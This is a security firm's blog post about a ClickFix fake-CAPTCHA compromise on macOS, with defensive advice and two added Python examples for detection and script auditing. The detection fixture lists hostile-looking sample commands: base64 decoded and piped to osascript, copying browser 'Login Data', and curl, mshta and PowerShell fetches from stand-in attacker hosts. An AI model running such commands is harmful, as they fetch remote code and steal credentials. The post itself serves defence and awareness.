ClickFix: The Attack That Asks You to Compromise Yourself
Bailey Marshall
Chief Technology Officer · 8 April 2026
We recently responded to a macOS compromise where the victim executed the malicious command themselves — willingly, without hesitation, because a website told them to.
No exploit. No zero-day. No phishing email with a malicious attachment. Just a fake CAPTCHA, a bash command, and a user doing what the page instructed.
This is ClickFix — and it's one of the most effective social engineering techniques we've seen gain traction in 2026.
What Happened
A user visited a legitimate company website that had been quietly compromised. Instead of the normal site, they were greeted by what appeared to be a browser security check — a “BotGuard” human verification prompt, styled to look like the Cloudflare CAPTCHA most internet users see dozens of times a week.
The prompt instructed the user to:
- Open Terminal
- Paste the provided command
- Press Enter to “complete verification”
The user followed the steps. The command executed a Base64-encoded AppleScript payload delivered from a command-and-control domain. That payload contacted a secondary C2 server to pull down additional modules. Within seconds, the malware was systematically copying browser databases — saved passwords, active session cookies, browsing history — and staging them in a temporary directory ready for exfiltration.
Huntress EDR detected the activity at execution and automatically isolated the host from the network, cutting off the exfiltration attempt. A non-standard browser profile configuration on this particular machine meant the malware targeted file paths that didn't exist — so credential theft was minimal. Remediation was completed the same day.
The outcome was contained. It easily might not have been.
Why ClickFix Works
ClickFix (sometimes called InstallFix in newer variants) exploits several overlapping psychological and technical realities:
Trusted site, malicious payload. The fake CAPTCHA appears on a real website — one the user has visited before and trusts. The infection begins before the user has any reason to be suspicious.
Familiar UX patterns. Browser-based verification prompts are part of everyday internet use. Users are conditioned to follow them without scrutiny.
Legitimate-sounding branding. Names like “BotGuard,” “Cloudflare Verification,” and “Human Check” borrow credibility from real services.
Developer blind spots. The pattern of curl | bash is a legitimate installation method used by tools like Homebrew, Rust, and nvm. Developers who run install commands regularly are particularly susceptible — the pattern is familiar, so the red flags are easier to miss.
Bypasses security controls entirely. Because the user initiates the action, the operating system treats it as legitimate. There's no exploit to detect, no malicious file attachment to block. Traditional security tools largely see nothing until the payload executes.
The Threat Landscape in 2026
ClickFix is no longer a novel technique used by a handful of actors. It has become a full attack framework adopted across at least 20 distinct malware campaigns between February and March 2026 alone, targeting both macOS and Windows users.
On macOS: Users are directed to Terminal to paste a bash or curl command, which downloads an infostealer — typically an AppleScript-based payload or a Nuitka-compiled Python binary.
On Windows: Users are directed to the Run dialog (Win+R), instructed to paste and execute a command that deploys PowerShell or mshta.exe payloads — infostealers like StealC, Lumma Stealer, or Rhadamanthys.
macOS users are disproportionately targeted. Of the campaigns tracked in early 2026, seven targeted macOS exclusively, and nine targeted both platforms. The likely reason: macOS users tend to hold higher-value credentials — SSH keys, cloud API tokens, developer secrets, and cryptocurrency wallets — making each successful infection more lucrative.
Known malware families currently using ClickFix distribution include:
- Infiniti Stealer — macOS-specific, Nuitka-compiled Python infostealer
- MacSync — macOS infostealer with dynamic AppleScript payloads and in-memory execution
- Amatera — Cross-platform, targeting browser data, session tokens, and crypto wallets
- StealC — Windows infostealer harvesting browser logins and Outlook credentials
- Lumma Stealer — Cross-platform, delivered via fake CAPTCHAs and counterfeit app installers
- ModeloRAT — Python-based trojan distributed via the KongTuke traffic distribution system through compromised WordPress sites
Distribution vectors extend beyond compromised websites. ClickFix campaigns also reach users through malvertising (sponsored search results on Google and Bing), SEO-poisoned pages, phishing emails, and fake software installers — including pages mimicking legitimate developer tools.
The variant involved in this incident was first observed only two days before we responded to it. These campaigns rotate infrastructure and payloads rapidly to stay ahead of detection.
The Golden Rule
No legitimate CAPTCHA, verification service, or browser security check will ever ask you to open Terminal, Command Prompt, PowerShell, or the Run dialog and paste a command.
Full stop. This is universally an attack vector. Legitimate verification happens entirely within the browser. If a website asks you to execute a system command — regardless of how professional the prompt looks, how trusted the site is, or how convincing the branding appears — it is attempting to compromise your system. Close the tab.
What Defenders Should Do
For individuals
- Treat any “verification” that requires leaving your browser as an attack — close the tab immediately
- Stop saving passwords in your browser. Use a dedicated password manager (1Password, Bitwarden). Browser credential stores are the primary target of infostealer campaigns
- Enable MFA on all critical accounts
- If you accidentally execute a suspicious command, disconnect from the internet immediately and begin incident response — don't wait to see what happens
For organisations
- Deploy EDR on every endpoint — macOS included. This incident was contained because Huntress detected and isolated the host at execution. Without EDR, there would have been no alert and no containment
- Run security awareness training that specifically covers ClickFix, including both the Terminal (macOS) and Run dialog (Windows) variants. The technique is prevalent enough in 2026 that it warrants dedicated coverage
- Monitor for osascript execution referencing browser data paths, curl commands contacting unknown domains, and PowerShell/mshta.exe execution from user-initiated contexts
- Alert on abnormal file descriptor limit changes on macOS — this is a known ClickFix indicator
- Block known malicious domains at the network perimeter and keep IOC feeds current
- If you run WordPress-based web properties, monitor for KongTuke/404 TDS injection indicators — the KongTuke traffic distribution system is actively compromising WordPress sites to inject fake CAPTCHA lures
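The monitoring bullets above describe the detection logic in words; this added Python example (not code from the original post or from any EDR product) applies those rules to a few constructed process events in a host|parent|process|cmdline form. The browser data paths, allowlisted domains and parent-process names are assumptions to tune for your own fleet.

```python
import re

# Constructed EDR-style process events (host|parent|process|cmdline); made up for this example.
SAMPLE_EVENTS = """\
mac-dev-01|Terminal|bash|bash -c "echo <base64 blob> | base64 -d | osascript"
mac-dev-01|bash|osascript|osascript -e 'do shell script "cp ~/Library/Application Support/Google/Chrome/Default/Login Data /tmp/.x/"'
mac-dev-01|bash|curl|curl -fsSL https://verify-botguard.example.invalid/x.sh
mac-dev-01|Terminal|bash|bash -c "brew install jq"
win-fin-07|explorer.exe|mshta.exe|mshta.exe https://captcha-check.example.invalid/v.hta
win-fin-07|explorer.exe|powershell.exe|powershell.exe -c "iwr https://captcha-check.example.invalid/p.ps1"
win-fin-07|outlook.exe|powershell.exe|powershell.exe -File C:\\Scripts\\cleanup.ps1
"""

# macOS locations holding browser credentials, cookies and history (assumed list; extend for your fleet).
BROWSER_DATA_PATHS = ("Library/Application Support/Google/Chrome",
                      "Library/Application Support/Firefox", "Library/Cookies")
# Hosts your own install tooling legitimately fetches from; anything else counts as unknown.
KNOWN_DOMAINS = {"github.com", "raw.githubusercontent.com", "brew.sh"}
# Parents meaning a human typed the command: terminal apps, and explorer.exe for the Win+R Run dialog.
USER_INITIATED_PARENTS = {"Terminal", "iTerm2", "explorer.exe"}

def parse_event(line: str) -> dict:
    # maxsplit keeps any pipes inside the command line intact
    host, parent, process, cmdline = line.split("|", 3)
    return {"host": host, "parent": parent, "process": process, "cmdline": cmdline}

def classify(event: dict) -> list[str]:
    """Return the ClickFix indicators an event matches; an empty list means nothing suspicious."""
    proc, parent, cmd = event["process"].lower(), event["parent"], event["cmdline"]
    findings = []
    if proc == "osascript" and any(p in cmd for p in BROWSER_DATA_PATHS):
        findings.append("osascript referencing browser data path")
    if proc == "curl":
        for host in re.findall(r"https?://([^/\s'\"]+)", cmd):
            if host not in KNOWN_DOMAINS:
                findings.append(f"curl to unknown domain {host}")
    if proc in ("powershell.exe", "mshta.exe") and parent in USER_INITIATED_PARENTS:
        findings.append(f"{proc} launched from user-initiated context ({parent})")
    if parent in USER_INITIATED_PARENTS and re.search(r"base64\s+(-d|-D|--decode)", cmd):
        findings.append("base64-decoded payload piped from an interactive shell")
    return findings

def scan(log_text: str) -> list[tuple[str, list[str]]]:
    """Scan newline-separated events; return (cmdline, findings) for each flagged event."""
    events = [parse_event(l) for l in log_text.splitlines() if l.strip()]
    hits = [(ev["cmdline"], classify(ev)) for ev in events]
    return [h for h in hits if h[1]]
```

The brew install and the Outlook-spawned PowerShell lines are deliberate negatives, so a tuned rule set should flag five of the seven events and leave those two alone.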
For website owners
- Audit your web applications regularly for injected JavaScript
- Implement Content Security Policy (CSP) headers to restrict unauthorised script execution
- Use Subresource Integrity (SRI) for third-party scripts
- Keep WordPress plugins updated — plugin vulnerabilities are a primary compromise vector for sites being used in ClickFix distribution
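To make the audit and SRI points above concrete, here is an added Python example (not code from the original post) that walks a page's script tags with the standard-library HTML parser, flags external scripts lacking an integrity attribute and any inline script blocks, and computes the SRI value for a script body you have verified as known-good. The HTML fragment and hostnames are constructed for the example.

```python
import base64
import hashlib
from html.parser import HTMLParser

# Constructed page fragment: one pinned CDN script, one unpinned third-party script,
# and an injected inline script of the kind a fake-CAPTCHA lure is inserted as.
SAMPLE_HTML = """
<html><head>
<script src="https://cdn.example.net/lib.js"
        integrity="sha384-PLACEHOLDER" crossorigin="anonymous"></script>
<script src="https://stats.example.org/track.js"></script>
<script>document.body.innerHTML = "<div id='botguard'>Verify you are human</div>";</script>
</head><body></body></html>
"""

def sri_hash(script_bytes: bytes) -> str:
    """Compute the integrity value browsers compare against, for a known-good script body."""
    digest = hashlib.sha384(script_bytes).digest()
    return "sha384-" + base64.b64encode(digest).decode()

class ScriptAuditor(HTMLParser):
    """Collect script tags that are either unpinned (no SRI) or inline (possible injection)."""
    def __init__(self):
        super().__init__()
        self.findings = []
        self._in_inline = False
    def handle_starttag(self, tag, attrs):
        if tag != "script":
            return
        a = dict(attrs)
        if "src" in a:
            if not a.get("integrity"):
                self.findings.append(f"external script without SRI: {a['src']}")
        else:
            self._in_inline = True   # script body arrives via handle_data
    def handle_data(self, data):
        if self._in_inline and data.strip():
            self.findings.append(f"inline script present: {data.strip()[:40]!r}")
    def handle_endtag(self, tag):
        if tag == "script":
            self._in_inline = False

def audit(html: str) -> list[str]:
    """Return the list of findings for a page; an empty list means every script is pinned and external."""
    parser = ScriptAuditor()
    parser.feed(html)
    return parser.findings
```

Run this against a clean copy of each template and again on the live page; a new inline script or a new unpinned src in the diff is exactly the injection this post describes.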
The Bottom Line
The three factors that limited damage in this incident were: a non-standard browser configuration that happened to put credential data outside the malware's default target paths, Huntress EDR detecting and isolating the host within seconds of execution, and immediate incident response. Two of those three are things you can control. One was luck.
ClickFix works because it replaces technical exploitation with social engineering — and social engineering scales. The same attack that compromised a macOS developer machine this week is running across dozens of campaigns simultaneously, hitting Windows endpoints through Run dialog lures, targeting accounting firm staff through fake Cloudflare prompts, and reaching developers through fake installer pages for tools they actually use.
The technique will keep evolving. InstallFix variants have already eliminated the fake CAPTCHA step entirely, masquerading as legitimate software installers to trigger the same user-initiated execution.
The defence doesn't change: know the pattern, trust your endpoint controls, and treat any web-initiated request to run a system command as hostile.
How Stealth Cyber Helps
Stealth Cyber provides managed detection and response, incident response, and security awareness training for SMBs across Australia and globally. Our SOC monitors your endpoints around the clock, and our incident response team is on call when something gets through.
This incident was contained because the right controls were already in place. If you want to understand your organisation's exposure to social engineering campaigns like ClickFix — or make sure you have the detection and response capability to catch what your users miss — we can help.
Are Your Endpoints Protected?
ClickFix bypasses traditional security controls because the user initiates the action. EDR with 24/7 monitoring is the difference between containment and compromise. Find out where your organisation stands.